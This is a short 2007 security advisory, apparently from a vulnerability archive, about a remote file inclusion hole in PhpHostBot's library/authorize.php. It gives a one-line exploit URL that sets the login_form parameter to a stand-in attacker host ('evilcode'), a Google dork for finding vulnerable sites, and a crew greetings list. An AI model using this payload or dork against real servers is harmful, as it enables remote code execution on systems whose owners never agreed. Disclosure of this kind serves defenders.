Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17621
HistoryJul 27, 2007 - 12:00 a.m.

SolpotCrew Advisory #14 (S4M3K) - PhpHostBot (login_form) Remote File Inclusion

2007-07-2700:00:00
vulners.com
35

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+

  • Greetz: Scr3W_W0rM, Nyubi, Home_edition2001, Dj-RuFfy, TOMMY_PENGAMEN, th0nk,
  • iFX, Cookie, VanDaMe, Dead
  • & All member on #nyubicrew @irc.mildnet.org

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+

  • Exploitation:
  • http://[target]/[path]/library/authorize.php?login_form=http://evilcode?

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+

  • google dork : "PhpHostBot" ; inurl:"PhpHostBot"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++